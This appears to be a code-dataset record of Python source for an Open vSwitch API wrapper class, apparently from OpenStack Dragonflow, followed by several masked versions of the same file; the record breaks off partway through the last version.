return False return True def get_interface_by_id_with_specified_columns(self, port_id, specified_columns): columns = {'external_ids', 'name'} columns.update(specified_columns) ifaces = self.ovsdb.db_find( 'Interface', ('external_ids', '=', {'iface-id': port_id}), columns=columns).execute() for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): # iface-id is the port id in neutron, the same neutron port # might create multiple interfaces in different bridges continue return iface def get_port_ofport_by_id(self, port_id): iface = self.get_interface_by_id_with_specified_columns( port_id, {'name', 'ofport'}) if iface and self._check_ofport(iface['name'], iface['ofport']): return iface['ofport'] def get_local_port_mac_in_use(self, port_id): iface = self.get_interface_by_id_with_specified_columns( port_id, {'mac_in_use'}) if iface and netaddr.valid_mac(iface['mac_in_use']): return iface['mac_in_use'] def _get_port_name_by_id(self, port_id): ifaces = self.ovsdb.db_find( 'Interface', ('external_ids', '=', {'iface-id': port_id}), columns=['external_ids', 'name']).execute() for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): # iface-id is the port id in neutron, the same neutron port # might create multiple interfaces in different bridges continue return iface['name'] def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None, bridge2_link_name=None): if bridge1_link_name is None: bridge1_link_name = "%s-patch" % bridge2 if bridge2_link_name is None: bridge2_link_name = "%s-patch" % bridge1 LOG.debug('genrated mappings {%(bridge1)s: %(link1)s,' ' %(bridge2)s: %(link2)s}', {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2': bridge2, 'link2': bridge2_link_name}) return (bridge1_link_name, bridge2_link_name) def map_patch_to_network(self, network, patch_name): self.bridge_mapping[network] = patch_name def get_phy_network_ofport(self, network): patch_name = self.bridge_mapping.get(network) if patch_name: return self.get_port_ofport(patch_name) def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=None, peer_link_name=None): links = self._gen_link_mapping( local_bridge, peer_bridge, local_link_name, peer_link_name) self._create_patch_port( local_bridge, links[0], peer_bridge, links[1]) self._create_patch_port( peer_bridge, links[1], local_bridge, links[0]) return links def _create_patch_port(self, bridge, port, peer, peer_port): if cfg.CONF.df.enable_dpdk: self.ovsdb.add_br(bridge, datapath_type='netdev').execute() else: self.ovsdb.add_br(bridge, datapath_type='system').execute() if not self.patch_port_exist(port): self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute() def patch_port_exist(self, port): return 'patch' == self._db_get_val('Interface', port, 'type', check_error=False, log_errors=False) def get_port_ofport(self, port): return self._db_get_val('Interface', port, 'ofport', check_error=False, log_errors=False) def get_port_mac_in_use(self, port): return self._db_get_val('Interface', port, 'mac_in_use', check_error=False, log_errors=False) def get_port_qos(self, port_id): port_qoses = self.ovsdb.db_find( 'QoS', ('external_ids', '=', {'iface-id': port_id}), columns=['external_ids', '_uuid']).execute() if port_qoses: ovsdb_qos = port_qoses[0] external_ids = ovsdb_qos['external_ids'] return qos.QosPolicy( id=external_ids.get('qos-id'), topic=external_ids.get('qos-topic'), version=external_ids.get('version'), ) def set_port_qos(self, port_id, qos): port_name = self._get_port_name_by_id(port_id) if not port_name: return max_kbps = qos.get_max_kbps() max_burst_kbps = qos.get_max_burst_kbps() with self.ovsdb.transaction(check_error=True) as txn: qos_uuid = txn.add(self.ovsdb.create_qos(port_id, qos)) txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', max_kbps), ('ingress_policing_burst', max_burst_kbps))) txn.add(self.ovsdb.db_set('Port', port_name, ('qos', qos_uuid))) def update_port_qos(self, port_id, qos): port_name = self._get_port_name_by_id(port_id) if not port_name: return max_kbps = qos.get_max_kbps() max_burst_kbps = qos.get_max_burst_kbps() with self.ovsdb.transaction(check_error=True) as txn: txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', max_kbps), ('ingress_policing_burst', max_burst_kbps))) txn.add(self.ovsdb.update_qos(port_id, qos)) def clear_port_qos(self, port_id): port_name = self._get_port_name_by_id(port_id) if not port_name: return with self.ovsdb.transaction(check_error=True) as txn: txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', 0), ('ingress_policing_burst', 0))) txn.add(self.ovsdb.db_set('Port', port_name, ('qos', []))) txn.add(self.ovsdb.delete_qos(port_id)) def delete_port_qos_and_queue(self, port_id): self.ovsdb.delete_qos(port_id).execute() def get_vtp_ofport(self, tunnel_type): return self.get_port_ofport(tunnel_type + '-vtp')
normal
{ "blob_id": "89a3c34b3145b93a4cfa78eeb055c8136ab2bfe6", "index": 2084, "step-1": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n <mask token>\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n <mask token>\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n <mask token>\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n <mask token>\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n <mask token>\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def check_controller(self, target):\n controllers = self.ovsdb.get_controller(self.integration_bridge\n ).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n <mask token>\n", "step-4": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def check_controller(self, target):\n controllers = self.ovsdb.get_controller(self.integration_bridge\n ).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n\n def _create_patch_port(self, bridge, port, peer, peer_port):\n if cfg.CONF.df.enable_dpdk:\n self.ovsdb.add_br(bridge, datapath_type='netdev').execute()\n else:\n self.ovsdb.add_br(bridge, datapath_type='system').execute()\n if not self.patch_port_exist(port):\n self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute()\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n\n def get_vtp_ofport(self, tunnel_type):\n return self.get_port_ofport(tunnel_type + '-vtp')\n", "step-5": "# Copyright (c) 2015 OpenStack Foundation.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport netaddr\nfrom oslo_config import cfg\nfrom oslo_log import log\nfrom ovs import vlog\n\nfrom dragonflow.controller.common import constants\nfrom dragonflow.db.models import ovs\nfrom dragonflow.db.models import qos\nfrom dragonflow.ovsdb import impl_idl\n\nLOG = log.getLogger(__name__)\n\nOFPORT_RANGE_MIN = 1\nOFPORT_RANGE_MAX = 65533\n\nOVS_LOG_FILE_NAME = 'df-ovs.log'\n\n\nclass OvsApi(object):\n \"\"\"The interface of openvswitch\n\n Consumers use this class to set openvswitch or get results from\n openvswitch.\n \"\"\"\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n # NOTE: This has to be this name vsctl_timeout, as neutron will use\n # this attribute to set the timeout of ovs db.\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = ('%s:%s:%s' % (self.protocol, self.ip, self.port))\n\n nb_api.db_change_callback(None, None,\n constants.CONTROLLER_OVS_SYNC_STARTED, None)\n\n self.ovsdb = impl_idl.DFOvsdbApi(\n nb_api, db_connection, self.vsctl_timeout)\n\n nb_api.db_change_callback(None, None,\n constants.CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(\n check_error=check_error, log_errors=log_errors)\n\n def _get_bridge_for_iface(self, iface_name):\n return self.ovsdb.iface_to_br(iface_name).execute()\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def check_controller(self, target):\n controllers = self.ovsdb.get_controller(\n 